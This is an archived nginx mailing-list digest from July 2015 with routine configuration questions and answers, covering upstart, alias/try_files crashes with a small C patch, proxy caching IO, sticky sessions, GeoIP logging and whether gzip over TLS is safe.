From: vikrant.thakur at gmail.com (vikrant singh) Date: Fri, 24 Jul 2015 16:09:02 -0700 Subject: upstart conf for managing nginx Message-ID: Hello, I wrote a small upstart script to stop/start nginx through upstart. This is how it looks description "nginx http daemon" start on (filesystem and net-device-up IFACE=lo) stop on runlevel [!2345] expect deamon respawn respawn limit 10 5 chdir /usr/local/nginx exec ./nginx I am running nginx from "/usr/local/nginx", and running as a user with super user. Still it hangs on start/stop command. Any idea what I may be missing.. Thanks, Vikrant From francis at daoine.org Sat Jul 25 07:00:23 2015 From: francis at daoine.org (Francis Daly) Date: Sat, 25 Jul 2015 08:00:23 +0100 Subject: upstart conf for managing nginx In-Reply-To: References: Message-ID: <20150725070023.GY23844@daoine.org> On Fri, Jul 24, 2015 at 04:09:02PM -0700, vikrant singh wrote: Hi there, > I wrote a small upstart script to stop/start nginx through upstart. This is > how it looks I do not have an upstart system to test on, but: * comparing with http://wiki.nginx.org/Upstart, you have "expect daemon" and that has "expect fork". * the binary you run is /usr/local/nginx/nginx; I think it is more common for it to be /usr/local/nginx/sbin/nginx. Does checking and changing either of those make a difference? Does "hangs" mean "things run fine eventually, but there is a delay"; or "things never run correctly"? (Is there anything in the nginx or upstart logs which might indicate the problem?) f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Sun Jul 26 14:25:19 2015 
From: nginx-forum at nginx.us (Per Hansson) Date: Sun, 26 Jul 2015 10:25:19 -0400 Subject: Alias regex use causing core dump as of nginx 1.7.1 Message-ID: Hi, after upgrading from the v1.6.3 to v1.8.0 stable branch an alias I used for Roundcubemail no longer works. I traced the issue back to a probable change made in nginx v1.7.1: "Bugfix: the "alias" directive used inside a location given by a regular expression worked incorrectly if the "if" or "limit_except" directives were used." In version 1.6.3 and 1.7.0 the following works fine: ## Roundcubemail for Remi repository location ~ ^/mail/(.+\.php)$ { alias /usr/share/roundcubemail/$1; client_max_body_size 5M; fastcgi_pass _php; } location ~ /mail { alias /usr/share/roundcubemail/; client_max_body_size 5M; try_files $uri $uri/ /index.php; } But in v1.7.1 it causes nginx to core dump if I visit the url domain.com/mail and if I visit domain.com/mail/ I get taken to the front page. [notice] 26221#0: signal 17 (SIGCHLD) received [alert] 26221#0: worker process 26223 exited on signal 11 (core dumped) [notice] 26221#0: start worker process 26231 [notice] 26221#0: signal 29 (SIGIO) received Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260558,260558#msg-260558 From highclass99 at gmail.com Sun Jul 26 15:29:51 2015 
From: highclass99 at gmail.com (highclass99) Date: Mon, 27 Jul 2015 00:29:51 +0900 Subject: Optimzing hard drive IO for proxy_pass Message-ID: I have server A with a large HDD at IDC 1 (TB hdd) I have server B with cheap bandwidth at IDC 2 (very small virtual server 20 GB hdd) I send all image requests to server B, and it caches from A. My problem is that on server IO is really high Server B iostat Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm %util sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05 8.78 4.64 0.25 47.71 dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 Here is my related nginx config --------------- cut -------------------------------------- proxy_cache_path /cache levels=1:2 keys_zone=MEDIA:200m inactive=2d max_size=6g; --------------- cut -------------------------------------- location / { proxy_pass http://SERVER_A proxy_cache MEDIA; proxy_cache_key "$scheme$request_uri"; proxy_cache_valid 200 302 304 7d; proxy_cache_valid 301 1h; proxy_cache_valid any 1m; proxy_cache_use_stale error timeout invalid_header http_500 http_502 http_503 http_504 http_404 updating; proxy_ignore_headers Cache-Control Expires Set-Cookie; proxy_cache_min_uses 3; proxy_cache_revalidate on; proxy_cache_lock on; proxy_cache_lock_timeout 15s; expires 7d; } --------------- cut -------------------------------------- Server B has nothing else running. Server B is sending about 200~400 MBs traffic outside Is such a high IO load normal? Is there a way I can decrease the IO load while keeping the caching of server B efficient? Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From highclass99 at gmail.com Sun Jul 26 15:31:47 2015 
From: highclass99 at gmail.com (highclass99) Date: Mon, 27 Jul 2015 00:31:47 +0900 Subject: Optimzing hard drive IO for proxy_pass In-Reply-To: References: Message-ID: Sorry everyone about the multiple posts with the same content... My own posts weren't coming to me at all through email... I just checked http://mailman.nginx.org/pipermail/nginx/2015-July/thread.html and found out all my posts were posted. Again I apologize for the inconvenience. :( It was sincerely a mistake. On Mon, Jul 27, 2015 at 12:29 AM, highclass99 wrote: > I have server A with a large HDD at IDC 1 (TB hdd) > I have server B with cheap bandwidth at IDC 2 (very small virtual server > 20 GB hdd) > > I send all image requests to server B, and it caches from A. > My problem is that on server IO is really high > > Server B iostat > Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz > avgqu-sz await svctm %util > sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 > 2.95 2.20 0.36 47.67 > sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 > 0.00 0.00 0.00 0.00 > sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 > 2.95 2.20 0.36 47.67 > dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05 > 8.78 4.64 0.25 47.71 > dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 > 0.00 0.00 0.00 0.00 > > Here is my related nginx config > --------------- cut -------------------------------------- > proxy_cache_path /cache levels=1:2 > keys_zone=MEDIA:200m > inactive=2d max_size=6g; > --------------- cut -------------------------------------- > location / { > proxy_pass http://SERVER_A > proxy_cache MEDIA; > proxy_cache_key "$scheme$request_uri"; > > proxy_cache_valid 200 302 304 7d; > proxy_cache_valid 301 1h; > proxy_cache_valid any 1m; > proxy_cache_use_stale error timeout invalid_header http_500 > http_502 http_503 http_504 http_404 updating; > proxy_ignore_headers Cache-Control Expires > Set-Cookie; > proxy_cache_min_uses 3; > proxy_cache_revalidate on; > proxy_cache_lock on; > proxy_cache_lock_timeout 15s; > > expires 7d; > 
} > --------------- cut -------------------------------------- > > Server B has nothing else running. > Server B is sending about 200~400 MBs traffic outside > Is such a high IO load normal? > Is there a way I can decrease the IO load while keeping the caching of > server B efficient? > > Thank you. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Jul 27 02:49:01 2015 From: nginx-forum at nginx.us (justink101) Date: Sun, 26 Jul 2015 22:49:01 -0400 Subject: Using dynamic access_log, automatically create parent directory Message-ID: We use a dynamic value for access logs: access_log /var/log/nginx/domains/$host/access.log main; However, if the $host directory does not exist in /var/log/nginx/domains nginx fails with an error creating the access log. Is there a way to have nginx create the $host directory automatically instead of failing? Seems like this should be default behavior? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260563,260563#msg-260563 From mdounin at mdounin.ru Mon Jul 27 05:47:12 2015 
From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 27 Jul 2015 08:47:12 +0300 Subject: Alias regex use causing core dump as of nginx 1.7.1 In-Reply-To: References: Message-ID: <20150727054712.GI19190@mdounin.ru> Hello! On Sun, Jul 26, 2015 at 10:25:19AM -0400, Per Hansson wrote: > Hi, after upgrading from the v1.6.3 to v1.8.0 stable branch an alias I used > for Roundcubemail no longer works. > I traced the issue back to a probable change made in nginx v1.7.1: > "Bugfix: the "alias" directive used inside a location given by a regular > expression worked incorrectly if the "if" or "limit_except" directives were > used." > > In version 1.6.3 and 1.7.0 the following works fine: > ## Roundcubemail for Remi repository > location ~ ^/mail/(.+\.php)$ { > alias /usr/share/roundcubemail/$1; > client_max_body_size 5M; > fastcgi_pass _php; > } > location ~ /mail { > alias /usr/share/roundcubemail/; > client_max_body_size 5M; > try_files $uri $uri/ /index.php; > } > > But in v1.7.1 it causes nginx to core dump if I visit the url > domain.com/mail and if I visit domain.com/mail/ I get taken to the front > page. > > [notice] 26221#0: signal 17 (SIGCHLD) received > [alert] 26221#0: worker process 26223 exited on signal 11 (core dumped) > [notice] 26221#0: start worker process 26231 > [notice] 26221#0: signal 29 (SIGIO) received Thanks, it was broken by this commit: http://hg.nginx.org/nginx/rev/c985d90a8d1f The patch below will fix the segfault. Note though, that the result probably won't work for you. The proper way to fix this would be not to use a regex location for /mail, but to use a prefix one instead, i.e.: location /mail { alias /usr/share/roundcubemail/; try_files $uri $uri/ /index.php; } (Note: no "~".) The configuration with regex location previously worked by coincidence - in try_files nginx used to do string comparison with regular expression specified, and this happened to produce sensible result in your case. 
Patch: # HG changeset patch # User Maxim Dounin # Date 1437975869 -10800 # Mon Jul 27 08:44:29 2015 +0300 # Node ID cb8f6e9d9943e2c8bd332443c0018a40353288fe # Parent d34cda011a8ed968c5f2c4469ce43b7e7f0afda6 Fixed segfault with try_files introduced by c985d90a8d1f. If alias was used in a location given by a regular expression, nginx used to do wrong thing in try_files if a location name (i.e., regular expression) was an exact prefix of URI. The following configuration triggered a segmentation fault on a request to "/mail": location ~ /mail { alias /path/to/directory; try_files $uri =404; } Reported by Per Hansson. diff --git a/src/http/ngx_http_core_module.c b/src/http/ngx_http_core_module.c --- a/src/http/ngx_http_core_module.c +++ b/src/http/ngx_http_core_module.c @@ -1239,7 +1239,9 @@ ngx_http_core_try_files_phase(ngx_http_r *e.pos = '\0'; - if (alias && ngx_strncmp(name, clcf->name.data, alias) == 0) { + if (alias && alias != NGX_MAX_SIZE_T_VALUE + && ngx_strncmp(name, clcf->name.data, alias) == 0) + { ngx_memmove(name, name + alias, len - alias); path.len -= alias; } -- Maxim Dounin http://nginx.org/ From bhuvangu at gmail.com Mon Jul 27 07:10:04 2015 
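Review bot: The added condition "alias != NGX_MAX_SIZE_T_VALUE" in ngx_http_core_try_files_phase() tests against a sentinel whose meaning is not stated anywhere in the hunk; a one-line comment saying which case it marks (from the commit message, apparently an alias inside a location given by a regular expression) would keep a later reader from dropping it as redundant. Since the commit message already quotes a minimal configuration that crashed on a request to "/mail", a regression test built from that configuration would be worth submitting alongside the fix.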
From: bhuvangu at gmail.com (Bhuvan Gupta)
Date: Mon, 27 Jul 2015 12:40:04 +0530
Subject: Nginx response with persistence session and backend server failure
Message-ID:

Hello all,

I was reading Nginx documentation on persistence session using cookie and below is from documentation

A request that comes from a client not yet bound to a particular server is passed to the server selected by the configured balancing method. Further requests with this cookie will be passed to the designated server. *If the designated server cannot process a request*, *the new server is selected as if the client has not been bound yet*.

The last line says that

*If the designated server cannot process a request*.

What does it mean to say "the server cannot process a request."

Question 1:
Does it mean the server was down?
or does it mean server responded with some error code?
or does it mean that it did not respond in a certain time interval?
or does it mean that max number of connection limit is reached on that server?

Question 2:
Let's say there were 3 backend servers and we are using session persistence using cookie.
Now assume that 2 of the backend servers go down so nginx will route all requests to 3rd server.
Now 2 other servers came back online, will nginx use the other 2 servers to route the request even if request has the persistence cookie for 3rd server.

Thanks

From nginx-forum at nginx.us Mon Jul 27 09:10:22 2015
From: nginx-forum at nginx.us (Jugurtha)
Date: Mon, 27 Jul 2015 05:10:22 -0400
Subject: GeoIP data in access_log Nginx
Message-ID: <39a47f15872b9279066e74f9edb58435.NginxMailingListEnglish@forum.nginx.org>

Hello World,

I would like to know if it is possible to put GeoIP data (country for example) in my access log (nginx).
I enabled the GeoIP module in my nginx (configure) and I would like to use the "$geoip_country_name" and "$geoip_city" in my access log.
I tried to add the two variables in my log format (main) but without success

    log_format main
        '$host $remote_addr - $remote_user [$time_local] "$request" '
        '$status $body_bytes_sent "$http_referer" '
        '"$http_user_agent" "$http_x_forwarded_for" "$request_time" "$upstream_cache_status" "$geoip_country_name" "$geoip_city"';

Result :

    my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "-" "-"

But I would like this one :

    my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "FR" "Paris"

Thanks for your help,

Best regards,
Jugurtha

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260566,260566#msg-260566

From nginx-forum at nginx.us Mon Jul 27 11:26:33 2015
From: nginx-forum at nginx.us (Per Hansson)
Date: Mon, 27 Jul 2015 07:26:33 -0400
Subject: Alias regex use causing core dump as of nginx 1.7.1
In-Reply-To: <20150727054712.GI19190@mdounin.ru>
References: <20150727054712.GI19190@mdounin.ru>
Message-ID: <20211ab18d0f4a62ba791388d03e29aa.NginxMailingListEnglish@forum.nginx.org>

Thanks Maxim, you are correct about not making the /mail location a regex, it solves the problem.
As for the core dump I compiled v1.9.3 with your patch and can confirm it no longer crashes with the original config.
But as you suspected the config anyway does not work without removing the regex for the /mail location...

Thanks for the quick fix!

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260558,260567#msg-260567

From krueger at lesspain.de Mon Jul 27 15:24:21 2015
From: krueger at lesspain.de (Robert Krüger)
Date: Mon, 27 Jul 2015 17:24:21 +0200
Subject: Is SSL and Compression never secure in nginx?
Message-ID:

Hi,

I am working in a project where a password-protected extranet application is behind an nginx proxy using ssl.

Now I asked the admin to enable server-side http-compression because we tend to have rather lengthy json responses from our REST api and they compress very well and the performance gain would be significant. He declined doing that, explaining that because of the CRIME vulnerability, it is not a good idea to enable compression when using ssl with nginx. Is this really always the case? Are there scenarios where the vulnerability is not a problem? I am trying to understand this better to make an informed decision because not using compression (encryption is a must) would incur other costs (optimizations in the code) and I don't just want to waste that time and money unless I have to.

Thanks in advance,

Robert

From mdounin at mdounin.ru Mon Jul 27 17:01:44 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Mon, 27 Jul 2015 20:01:44 +0300
Subject: GeoIP data in access_log Nginx
In-Reply-To: <39a47f15872b9279066e74f9edb58435.NginxMailingListEnglish@forum.nginx.org>
References: <39a47f15872b9279066e74f9edb58435.NginxMailingListEnglish@forum.nginx.org>
Message-ID: <20150727170144.GJ19190@mdounin.ru>

Hello!

On Mon, Jul 27, 2015 at 05:10:22AM -0400, Jugurtha wrote:

> Hello World,
>
> I would like to know if is possible to put GeoIP data (country for exemple)
> in my log access (nginx)
> I enabled the GeoIP module in my nginx (configure) and i would like to use
> the "$geoip_country_name" and "$geoip_city" in my accesslog
> I tried to add the two variables in my log format (main) but without
> success
>
> log_format main
> '$host $remote_addr - $remote_user [$time_local] "$request" '
> '$status $body_bytes_sent "$http_referer" '
> '"$http_user_agent" "$http_x_forwarded_for" "$request_time"
> "$upstream_cache_status" "$geoip_country_name" "$geoip_city"';

This is expected to work fine.

> Result :
>
> my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET
> /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64)
> AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
> "0.001" "HIT" "-" "-"

Most likely geo information is not available for some reason. First of all I would recommend to check if appropriate GeoIP databases are present on your system and loaded into nginx using the geoip_country (for $geoip_country_name) and geoip_city (for $geoip_city) configuration directives.

--
Maxim Dounin
http://nginx.org/

From reallfqq-nginx at yahoo.fr Mon Jul 27 17:29:23 2015
From: reallfqq-nginx at yahoo.fr (B.R.)
Date: Mon, 27 Jul 2015 19:29:23 +0200
Subject: Nginx response with persistence session and backend server failure
In-Reply-To:
References:
Message-ID:

On Mon, Jul 27, 2015 at 9:10 AM, Bhuvan Gupta wrote:

> Hello all,
>
> I was reading Nginx documentation on
> persistence session using cookie and below is from documentation
>
> A request that comes from a client not yet bound to a particular server is
> passed to the server selected by the configured balancing method. Further
> requests with this cookie will be passed to the designated server. *If
> the designated server cannot process a request*, *the new server is
> selected as if the client has not been bound yet*.
>
> The last line says that
>
> *If the designated server cannot process a request*.
>
> What does it mean to say "the server cannot process a request."
>
> Question 1:
> Does it mean the server was down ?
> or does it mean server responded with some error code ?
> or does it mean that it did not responded in a certain time interval ?
> or does it mean that max number of connection limit is reached on that
> server ?
>

It seems pretty clear to me that it describes whatever reason a server could have of not being able to handle a request.
Your points #1 and #3 cannot be differentiated from a client point of view.
Your point #4 makes the connection being refused (or times out? then it joins the 2 first points).
In those cases, the load balancer will try to find some machine accepting the request.

Your point #2 is edgy: what kind of error? If it is a processing error, the request has been, by definition, processed, thus there is no need to contact another server.
I suspect 5xx codes might consider the upstream being unavailable, while 4xx means the request processing has occurred.

> Question 2:
> Let say there were 3 backend-server and we are using session persistence
> using cookie.
> Now assume that 2 of the backed server goes down so niginx will route all
> request to 3rd server
> Now 2 other server came back online, will niginx use the other 2 server to
> route the request even if request have the persistence cookie for 3rd
> server.
>

It is explicitly said 'A request that comes from a client not yet bound to a particular server [...]'.
If the 3rd server has been selected because it responds correctly, the client will be bound to it, thus it won't change when the other 2 servers come back online.

That represents the added value of having a server-side cookie. On a basic load-balancing setup (no way to 'tie' a client to a server), the load-balancing would have resumed connecting the client to the server it is supposed to connect to (either following the load-balancing key or simply selecting the 'next' upstream based on the configured method).
---
*B. R.*

From mdounin at mdounin.ru Mon Jul 27 17:34:14 2015
From: mdounin at mdounin.ru (Maxim Dounin)
Date: Mon, 27 Jul 2015 20:34:14 +0300
Subject: Is SSL and Compression never secure in nginx?
In-Reply-To:
References:
Message-ID: <20150727173414.GL19190@mdounin.ru>

Hello!

On Mon, Jul 27, 2015 at 05:24:21PM +0200, Robert Krüger wrote:

> Hi,
>
> I am working in a project where a password-protected extranet application
> is behind an nginx proxy using ssl.
>
> Now I asked the admin to enable server-side http-compression because we
> tend to have rather lengthy json responses from our REST api and they
> compress very well and the performance gain would be significant. He
> decline doing that, explaining that because of the CRIME vulnerability, it
> is not a good idea to enable compression when using ssl with nginx. Is this
> really always the case? Are there scenarios where the vulnerability is not
> a problem? I am trying to understand this better to make an informed
> decision because not using compression (encryption is a must) would incur
> other costs (optimizations in the code) and I don't just want to waste that
> time and money unless I have to.

The CRIME attack only applies when you are using SSL compression, which is always off in nginx.

There is a similar attack on gzip http compression, BREACH. It only applies if you return sensitive data in a response with some user-controlled data, and compress them together. Such attacks usually can be more or less easily mitigated by either not compressing sensitive responses (nginx allows to control gzip compression on a per-location basis) or implementing some rate limits (like limit_req).

See here for more details:

https://en.wikipedia.org/wiki/BREACH_(security_exploit)

--
Maxim Dounin
http://nginx.org/

From reallfqq-nginx at yahoo.fr Mon Jul 27 17:35:11 2015
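The two mitigations named in Maxim Dounin's reply above (per-location gzip control and limit_req), written out as a configuration. This is an added example, not configuration posted in the thread; the host name, upstream name, certificate paths, location paths, zone name and rates are all assumptions.

```nginx
# Added example, not from the thread. All names, paths and rates are assumed.
# Place inside the http {} block.

# Per-client request budget. BREACH depends on a large number of requests
# whose compressed sizes are compared, so a low sustained rate makes it slow
# and noisy in the logs.
limit_req_zone $binary_remote_addr zone=per_client:10m rate=5r/s;
limit_req_status 429;

upstream extranet_app {
    server 127.0.0.1:8080;
}

server {
    listen 443 ssl;
    server_name extranet.example.com;

    ssl_certificate     /etc/nginx/ssl/extranet.crt;
    ssl_certificate_key /etc/nginx/ssl/extranet.key;

    # Weak variant, for comparison: "gzip on; gzip_types application/json;"
    # here at server level would compress every JSON response, including
    # ones that put a secret and request-controlled text in the same body.
    gzip off;

    # Large JSON reports: no token or other secret in the body, so the
    # bandwidth gain is taken, with the rate limit as a second layer.
    location /api/reports/ {
        gzip            on;
        gzip_types      application/json;
        gzip_min_length 1024;

        limit_req zone=per_client burst=20 nodelay;

        proxy_pass http://extranet_app;
    }

    # Responses that carry session or CSRF tokens next to reflected input:
    # never compressed, neither by nginx nor by the backend.
    location /account/ {
        gzip off;

        # Without this the backend may gzip the body itself and nginx
        # would relay it unchanged.
        proxy_set_header Accept-Encoding "";

        limit_req zone=per_client burst=5;

        proxy_pass http://extranet_app;
    }
}
```

After a reload, a response from the uncompressed location should come back without a `Content-Encoding: gzip` header even when the client sends `Accept-Encoding: gzip`.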
From: reallfqq-nginx at yahoo.fr (B.R.)
Date: Mon, 27 Jul 2015 19:35:11 +0200
Subject: Is SSL and Compression never secure in nginx?
In-Reply-To:
References:
Message-ID:

CRIME has been superseded by BREACH, and it is in no way related to any specific Web server, but to the more general concepts of TLS-encrypted (gzip-?)compressed HTTP content (SPDY is fine).

On the following website you will get all the details as well as a cheat-sheet list of ideas to mitigate it. Disabling gzip compression when encrypting HTTP content is one idea.
http://breachattack.com/

The baseline is: nginx in itself has nothing to do with it.
---
*B. R.*

On Mon, Jul 27, 2015 at 5:24 PM, Robert Krüger wrote:

>
> Hi,
>
> I am working in a project where a password-protected extranet application
> is behind an nginx proxy using ssl.
>
> Now I asked the admin to enable server-side http-compression because we
> tend to have rather lengthy json responses from our REST api and they
> compress very well and the performance gain would be significant. He
> decline doing that, explaining that because of the CRIME vulnerability, it
> is not a good idea to enable compression when using ssl with nginx. Is this
> really always the case? Are there scenarios where the vulnerability is not
> a problem? I am trying to understand this better to make an informed
> decision because not using compression (encryption is a must) would incur
> other costs (optimizations in the code) and I don't just want to waste that
> time and money unless I have to.
>
> Thanks in advance,
>
> Robert
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>

From vl at nginx.com Mon Jul 27 18:04:18 2015
From: vl at nginx.com (Vladimir Homutov)
Date: Mon, 27 Jul 2015 21:04:18 +0300
Subject: Nginx response with persistence session and backend server failure
In-Reply-To:
References:
Message-ID: <20150727180417.GB32277@gbox.status.megafon.ru>

On Mon, Jul 27, 2015 at 12:40:04PM +0530, Bhuvan Gupta wrote:

> Hello all,
>
> I was reading Nginx documentation on
> persistence session using cookie and below is from documentation
>
> A request that comes from a client not yet bound to a particular server is
> passed to the server selected by the configured balancing method. Further
> requests with this cookie will be passed to the designated server. *If the
> designated server cannot process a request*, *the new server is selected as
> if the client has not been bound yet*.
>
> The last line says that
>
> *If the designated server cannot process a request*.
>
> What does it mean to say "the server cannot process a request."

it means:

- nginx either failed to contact upstream server and get response from it (within configured timeouts - see proxy_*_timeout directives), or some limit was hit (i.e. max_conns)

- either the response was obtained, but considered inadequate and nginx decided not to deliver the answer to client and instead try other server (or return an error immediately - see nginx.org/r/proxy_next_upstream)

>
> Question 1:
> Does it mean the server was down ?
> or does it mean server responded with some error code ?
> or does it mean that it did not responded in a certain time interval ?
> or does it mean that max number of connection limit is reached on that
> server ?

in short: this is configurable, see above.

>
> Question 2:
> Let say there were 3 backend-server and we are using session persistence
> using cookie.
> Now assume that 2 of the backed server goes down so niginx will route all
> request to 3rd server
> Now 2 other server came back online, will niginx use the other 2 server to
> route the request even if request have the persistence cookie for 3rd
> server.

obviously, not. If a request has a cookie for 3rd server and it is available, it will be routed to a 3rd server. Requests without cookies will be routed to servers according to load balancing methods.

From tfransosi at gmail.com Mon Jul 27 19:28:25 2015
From: tfransosi at gmail.com (Thiago Farina)
Date: Mon, 27 Jul 2015 16:28:25 -0300
Subject: upstart conf for managing nginx
In-Reply-To: <20150725070023.GY23844@daoine.org>
References: <20150725070023.GY23844@daoine.org>
Message-ID:

Besides everything Francis said, there is also a typo in the 'expect' line.

s/deamon/daemon

--
Thiago Farina

From tfransosi at gmail.com Mon Jul 27 19:30:35 2015
From: tfransosi at gmail.com (Thiago Farina)
Date: Mon, 27 Jul 2015 16:30:35 -0300
Subject: How to run nginx unit tests?
In-Reply-To: <13e58dd89ea7af362132361ed037ebed.NginxMailingListEnglish@forum.nginx.org>
References: <20150722175530.GB1500@mdounin.ru> <13e58dd89ea7af362132361ed037ebed.NginxMailingListEnglish@forum.nginx.org>
Message-ID:

On Wed, Jul 22, 2015 at 3:53 PM, rms wrote:

> Thanks Maxim. So from end user's perspective is there something I can do to
> test the validity of build/install?
>

Not sure what kind of confirmation you want, but you can try starting the service perhaps? Does that work?

You can also test the config with:

    $ sudo nginx -t

Hope that helps,

Regards,

--
Thiago Farina

From krueger at lesspain.de Tue Jul 28 08:13:37 2015
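Vladimir Homutov's reply in the session-persistence thread above says that "cannot process a request" is configurable; the configuration below shows which directive decides each of the four cases from Question 1. It is an added example, not configuration from the thread: the addresses, cookie name, timeouts and limits are assumptions, and `sticky cookie` requires the commercial NGINX Plus build (`max_conns` is in open-source nginx from 1.11.5).

```nginx
# Added example, not from the thread. Addresses, names and values are assumed.
# Place inside the http {} block.

upstream backend {
    # max_conns: the "connection limit reached" case. A server at its limit
    # is skipped even when the cookie designates it.
    # max_fails / fail_timeout: after 2 failed attempts within 10s the server
    # is considered unavailable for the next 10s, then tried again.
    server 10.0.0.11:8080 max_conns=200 max_fails=2 fail_timeout=10s;
    server 10.0.0.12:8080 max_conns=200 max_fails=2 fail_timeout=10s;
    server 10.0.0.13:8080 max_conns=200 max_fails=2 fail_timeout=10s;

    # Session persistence (NGINX Plus only). The first response sets
    # srv_id; later requests carrying it go to the designated server while
    # that server is available.
    sticky cookie srv_id expires=1h path=/;
}

server {
    listen 80;

    location / {
        proxy_pass http://backend;

        # The "did not respond in a certain time interval" case is bounded
        # by these three timeouts.
        proxy_connect_timeout 2s;
        proxy_send_timeout    10s;
        proxy_read_timeout    10s;

        # What counts as a failed attempt and sends the request on to
        # another server:
        #   error    - connection refused or reset (the "server was down" case)
        #   timeout  - one of the timeouts above expired
        #   http_5xx - the "responded with some error code" case, only for
        #              the codes listed here
        # The default is "error timeout", so with the default any HTTP
        # status from the designated server is delivered to the client as is.
        proxy_next_upstream error timeout http_502 http_503 http_504;

        # Bound the failover so one bad request cannot walk the whole pool.
        proxy_next_upstream_tries 2;
    }
}
```

A client whose cookie names a server that later recovers keeps going to whichever server its current cookie designates, which matches the answer to Question 2 in the thread.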
From: krueger at lesspain.de (Robert Krüger)
Date: Tue, 28 Jul 2015 10:13:37 +0200
Subject: Is SSL and Compression never secure in nginx?
In-Reply-To:
References:
Message-ID:

OK, thanks a lot for the feedback. That helped. I will try to find out if one of the "fixes" applies to our case.

On Mon, Jul 27, 2015 at 7:35 PM, B.R. wrote:

> CRIME has been superseded by BREACH, and it is in no way related to any
> specific Web server, but to the more general concepts of TLS-encrypted
> (gzip-?)compressed HTTP content (SPDY is fine).
>
> On the following website you will get all the details as well as a
> cheat-sheet list of ideas to mitigate it. Disabling gzip compression when
> encrypting HTTP content is one idea.
> http://breachattack.com/
>
> The baseline is: nginx in itself has nothing to do with it.
> ---
> *B. R.*
>
> On Mon, Jul 27, 2015 at 5:24 PM, Robert Krüger
> wrote:
>
>>
>> Hi,
>>
>> I am working in a project where a password-protected extranet application
>> is behind an nginx proxy using ssl.
>>
>> Now I asked the admin to enable server-side http-compression because we
>> tend to have rather lengthy json responses from our REST api and they
>> compress very well and the performance gain would be significant. He
>> decline doing that, explaining that because of the CRIME vulnerability, it
>> is not a good idea to enable compression when using ssl with nginx. Is this
>> really always the case? Are there scenarios where the vulnerability is not
>> a problem? I am trying to understand this better to make an informed
>> decision because not using compression (encryption is a must) would incur
>> other costs (optimizations in the code) and I don't just want to waste that
>> time and money unless I have to.
>>
>> Thanks in advance,
>>
>> Robert
>>

From nginx-forum at nginx.us Tue Jul 28 12:42:42 2015
From: nginx-forum at nginx.us (Jugurtha)
Date: Tue, 28 Jul 2015 08:42:42 -0400
Subject: GeoIP data in access_log Nginx
In-Reply-To: <20150727170144.GJ19190@mdounin.ru>
References: <20150727170144.GJ19190@mdounin.ru>
Message-ID:

Hello Maxim,

Thanks for the reply, you are the best ;)

I would like to add the GeoIP data into my access log to facilitate processing in Kibana (ELK stack).
Maybe it is not the good way because I know it is possible to do this with LogStash (GeoIP Filter), and this would reduce pressure on Nginx (what do you think?)

    #Conf GEOIP (Load GeoIP Lib) => Downloaded on maxmind website
    geoip_country /var/lib/GeoIP/GeoIP.dat;
    geoip_city /var/lib/GeoIP/GeoLiteCity.dat;

    #My log format
    log_format main
        '$host $remote_addr - $remote_user [$time_local] "$request" '
        '$status $body_bytes_sent "$http_referer" '
        '"$http_user_agent" "$http_x_forwarded_for" "$request_time" "$upstream_cache_status" "$gzip_ratio" "$geoip_country_code"';

=> it works well with "$geoip_country_code"

    my.domain.fr xxx.xxx.xxx.xxx - - [28/Jul/2015:14:29:38 +0200] "GET /test.jpg HTTP/1.0" 200 270225 "-" "Wget/1.12 (linux-gnu)" "-" "0.048" "MISS" "-" "FR"

Merci, thanks again.

Best regards,
Jugurtha

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260566,260586#msg-260586

From nginx-forum at nginx.us Tue Jul 28 19:15:32 2015
From: nginx-forum at nginx.us (cskalyan)
Date: Tue, 28 Jul 2015 15:15:32 -0400
Subject: log files as non root user
Message-ID: <75686701f8efe8909a567b3fec836d3e.NginxMailingListEnglish@forum.nginx.org>

Hello Everyone,

I am trying to configure nginx where logs and pid file are written to a custom path and owned as non root. Whenever I start nginx these files are created and owned as root. In ngnix.conf I defined as below. Please advise.

    user usradmin mwgroup;
    worker_processes 1;

    error_log /export/local/opt/ngnix/logs/error.log warn;
    pid /export/local/opt/ngnix/logs/nginx.pid;

    events {
        worker_connections 1024;
    }

    http {
        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        log_format main '$remote_addr - $remote_user [$time_local] "$request" '
                        '$status $body_bytes_sent "$http_referer" '
                        '"$http_user_agent" "$http_x_forwarded_for"';

